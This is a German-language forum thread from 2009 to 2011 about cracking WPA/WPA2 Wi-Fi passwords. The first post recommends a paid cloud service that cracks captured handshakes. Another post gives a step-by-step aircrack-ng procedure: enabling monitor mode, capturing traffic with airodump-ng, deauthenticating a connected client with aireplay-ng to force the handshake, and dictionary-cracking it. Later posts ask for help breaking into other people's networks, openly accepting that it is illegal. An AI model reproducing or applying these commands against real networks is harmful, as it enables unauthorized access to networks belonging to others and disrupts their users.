myGully.com Boerse.SH - BOERSE.AM - BOERSE.IO - BOERSE.IM Boerse.BZ .TO Nachfolger
Ungelesen 10.12.09, 15:44   #1
Bratwurstwetter
Banned
 
Registriert seit: May 2009
Beiträge: 296
Bedankt: 89
Bratwurstwetter ist noch neu hier! | 0 Respekt Punkte
Standard [Tip] WPA/WPA2 Cracker

Hey!
Wollte euch mal einen kleinen Tip geben, falls ihr vergeblich versucht, das Passwort eines mit WPA/WPA2 verschlüsselten WLAN´s zu cracken, oder zu wenig Zeit und Rechenleistung habt, um es zu bruteforcen.

Alles was ihr braucht ist das Capture File (pcap) des Routers, inkl. 4-Way Handshake.

Auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] könnt ihr dann für 17 Dollar veruschen, dass Passwort knacken zu lassen.

Dazu wird ein 400 CPU Cluster verwendet, der in einem 120 Millionen-Wörter starken Wörterbuch nach dem Passwort sucht, und das in nur 20 Minuten.

Alternativ kann man das auch kostenlos auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] probieren, allerdings sind die ESSID´s vorgegeben, und enthällt fast nur englische Modelle.

MFG Bratwurstwetter
Bratwurstwetter ist offline   Mit Zitat antworten
Folgendes Mitglied bedankte sich bei Bratwurstwetter:
sandwich60 (19.07.20)
Ungelesen 10.12.09, 15:52   #2
StOn€_9
DGT Supporter
 
Benutzerbild von StOn€_9
 
Registriert seit: Feb 2009
Beiträge: 72
Bedankt: 235
StOn€_9 ist noch neu hier! | 8 Respekt Punkte
Standard

Zitat:
Alles was ihr braucht ist das Capture File (pcap) des Routers, inkl. 4-Way Handshake.
Hmm.. wie mach ich das?

mfg
StOn€_9 ist offline   Mit Zitat antworten
Ungelesen 10.12.09, 16:00   #3
haze303
xor eax, eax
 
Benutzerbild von haze303
 
Registriert seit: Sep 2009
Beiträge: 597
Bedankt: 465
haze303 ist noch neu hier! | 1 Respekt Punkte
Standard

Zitat:
Zitat von StOn€_9 Beitrag anzeigen
Hmm.. wie mach ich das?

mfg
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]

Viel Spaß damit und nicht vergessen - nicht an WLANs anweden, welche einem nicht gehören oder man nicht die ausdrückliche Erlaubnis zum Pen-Testen des fremden Netzes hat.
__________________
Desktop: Arch Linux | Laptop: Arch Linux
VM: Windows 7, Windows XP, Fedora 14, Arch, Windows Server 2008 R2 Enterprise
haze303 ist offline   Mit Zitat antworten
Ungelesen 11.12.09, 13:24   #4
romi01
...
 
Benutzerbild von romi01
 
Registriert seit: Nov 2009
Beiträge: 23
Bedankt: 334
romi01 ist noch neu hier! | 0 Respekt Punkte
Standard

Zitat:
Zitat von Bratwurstwetter Beitrag anzeigen
Hey!
Wollte euch mal einen kleinen Tip geben, falls ihr vergeblich versucht, das Passwort eines mit WPA/WPA2 verschlüsselten WLAN´s zu cracken, oder zu wenig Zeit und Rechenleistung habt, um es zu bruteforcen.

Alles was ihr braucht ist das Capture File (pcap) des Routers, inkl. 4-Way Handshake.

Auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] könnt ihr dann für 17 Dollar veruschen, dass Passwort knacken zu lassen.

Dazu wird ein 400 CPU Cluster verwendet, der in einem 120 Millionen-Wörter starken Wörterbuch nach dem Passwort sucht, und das in nur 20 Minuten.

Alternativ kann man das auch kostenlos auf [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] probieren, allerdings sind die ESSID´s vorgegeben, und enthällt fast nur englische Modelle.

MFG Bratwurstwetter

hast du die schon selber ausprobiert ???
romi01 ist offline   Mit Zitat antworten
Ungelesen 11.12.09, 14:17   #5
Bratwurstwetter
Banned
 
Registriert seit: May 2009
Beiträge: 296
Bedankt: 89
Bratwurstwetter ist noch neu hier! | 0 Respekt Punkte
Standard

Ja, hab mir das 2 mal gegönnt, und die aufgezeichnete pcap Datei meines WPA2 Routers dort knacken lassen. Hat auch wunderbar funktioniert. Nach ner halben Stunde hatte ich ne Mail mit dem Passwort.
Zuerst ein sehr leichtes, danach nur eins aus Zahlen. Beide wurden in deren Wörterbuch gefunden.

Aber eins muss dir klar sein, wenn jem. sein WPA2 Passwort "HHDjdi39§("(§0ß290u2E" gesetzt hat, ist die Warscheinlichkeit sehr gering, dass dieses PW im Wörterbuch zu finden ist...
Und das Geld bekommst du dann auch nicht wieder.
Da meiner Erfahrung nach aber die meisten einfache Wörter als Passwörter benutzen, lohnt es sich allemal!

Gruß!
Bratwurstwetter ist offline   Mit Zitat antworten
Ungelesen 11.12.09, 14:30   #6
Bratwurstwetter
Banned
 
Registriert seit: May 2009
Beiträge: 296
Bedankt: 89
Bratwurstwetter ist noch neu hier! | 0 Respekt Punkte
Standard

Und zu deiner PM, wo man die Capture Datei findet und für was man die braucht:

(Ich veröffentliche deine Frage einafch mal, damit andere auch was von haben, unwissenheit ist ja nichts schlimmes )

Ich geh nochmal die Schritte schnell durch...


airmon-ng stop ath0 (löscht moni mode)
airmon-ng start wifi0 (start moni mode auf ath0)

airodump-ng –w ath1 (nach AP´s mit Client suchen, alles merken)

airodump-ng –w CAPDATEI –c CHANNEL --bssid ROUTERNAME ath1 (-w ist write, schreibt also in die Cap Datei, channel des Routers, bssid name des routers, wenn leerzeichen hat, mit hochstrich einklammern, sprich 'Speedport W500 V' )

aireplay-ng -0 1 -a ROUTERMAC –c VERBUNDENERCLIENTMAC ath1 (den client disconnecten, um den handshake in die cap datei zu schreiben)

In Airodump sollte oben rechts jetzt Handshake stehen, sprich der Handshake wurde in die Cap Datei gespeichert...

Wenn du ein eigenes Wörterbuch hast, kannst du versuchen, es selbst zu knacken..

aircrack-ng -0 –x2 -w WÖRTERBUCH.txt FILE.cap

Die Cap Datei sollte in deinem Root Verzeichnis sein, diese kannst du dann auf den besagten Seiten hochladen.

Wenn du Englisch kannst, solltest du dir das [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] ansehen...

Viel Erfolg!
MFG Bratwurstwetter...

BTW mein 100. Post
Bratwurstwetter ist offline   Mit Zitat antworten
Folgendes Mitglied bedankte sich bei Bratwurstwetter:
Gorilla (21.07.20)
Ungelesen 11.12.09, 17:31   #7
sTarBuZz
~Shisha-Chiller~
 
Benutzerbild von sTarBuZz
 
Registriert seit: Jul 2009
Ort: C:\Windows\System32\explorer.exe
Beiträge: 122
Bedankt: 107
sTarBuZz ist noch neu hier! | 0 Respekt Punkte
Standard

@Bratwurstwetter:
bei deiner anleitung hätt ich eine anmerkung:

Der Handshake ensteht nicht, wenn man den Client disconnected, sondern erst, wenn dieser sich wieder anmeldet^^
__________________
"Oh, ein sprechender Elch will meine Kreditkartennummer... das find ich ein faires Angebot!"
sTarBuZz ist offline   Mit Zitat antworten
Ungelesen 11.12.09, 19:26   #8
romi01
...
 
Benutzerbild von romi01
 
Registriert seit: Nov 2009
Beiträge: 23
Bedankt: 334
romi01 ist noch neu hier! | 0 Respekt Punkte
Standard

danke
pcap = .cap datei hätte ich wissen müssen .
romi01 ist offline   Mit Zitat antworten
Ungelesen 17.12.09, 23:12   #9
romi01
...
 
Benutzerbild von romi01
 
Registriert seit: Nov 2009
Beiträge: 23
Bedankt: 334
romi01 ist noch neu hier! | 0 Respekt Punkte
Standard

hast du vieleicht eine ahnung wieso bleibt mein pc bei eine life-cd
immer hängen wenn ich der befehl
aircrack-ng -b 00:09:5B9:96:1C filename-01.cap
eingebe ???
wep hack .
romi01 ist offline   Mit Zitat antworten
Ungelesen 09.06.10, 19:35   #10
kotej
Anfänger
 
Registriert seit: Feb 2010
Beiträge: 1
Bedankt: 1
kotej ist noch neu hier! | 0 Respekt Punkte
Standard

Wie soll denn dein Rechner au eine CD schreiben können. Geht nicht im Live-CD Modus
kotej ist offline   Mit Zitat antworten
Ungelesen 09.06.10, 21:21   #11
spartan-b292
Echter Freak
 
Benutzerbild von spartan-b292
 
Registriert seit: Mar 2010
Ort: /home/spartan-b292
Beiträge: 2.866
Bedankt: 1.700
spartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punkte
Standard

Zitat:
Aber eins muss dir klar sein, wenn jem. sein WPA2 Passwort "HHDjdi39§("(§0ß290u2E" gesetzt hat, ist die Warscheinlichkeit sehr gering, dass dieses PW im Wörterbuch zu finden ist...
Das stimmt, wird aber das Passwort mit Rainbowtables "geknackt" sieht die Sache schon wieder anderst aus..vorrausgesetzt die Rechnpower ist hoch und die Tabellen gut genug.
__________________
"They who can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety"
spartan-b292 ist offline   Mit Zitat antworten
Folgendes Mitglied bedankte sich bei spartan-b292:
Gorilla (21.07.20)
Ungelesen 18.05.11, 11:33   #12
SilvaOne
Anfänger
 
Registriert seit: Oct 2009
Beiträge: 1
Bedankt: 0
SilvaOne ist noch neu hier! | 0 Respekt Punkte
Standard

hätte da mal ne fragen zu demm ganzen WPA2 kramm hier habe davon so gut we kene ahnung aber wollte mal fragen obs nen prog gbt das mich das manuel hecken läst ohen € oder $ latzen zu müssen klar werd dich dann woll gegen nen paar § und absätze verstossen aebr das ja nix neues bei so vielen menschen auf der Welt die sich schlimmeren vergehen hingeben...... Also wäre es mir öglich mit nem freeload Prog. nen hacker zu finden mit dehm ich die wlan WPa 2 verschlüsselung kancken kann ohne irgendwas zu haben wie zb Router Ip oder son zeug?

mfg

SilvaOne
SilvaOne ist offline   Mit Zitat antworten
Antwort

Themen-Optionen
Ansicht

Forumregeln
Du kannst keine neue Themen eröffnen
Du kannst keine Antworten verfassen
Du kannst keine Anhänge posten
Du kannst nicht deine Beiträge editieren

BB code is An
Smileys sind An.
[IMG] Code ist An.
HTML-Code ist Aus.

Gehe zu


Alle Zeitangaben in WEZ +1. Es ist jetzt 16:17 Uhr.


Sitemap

().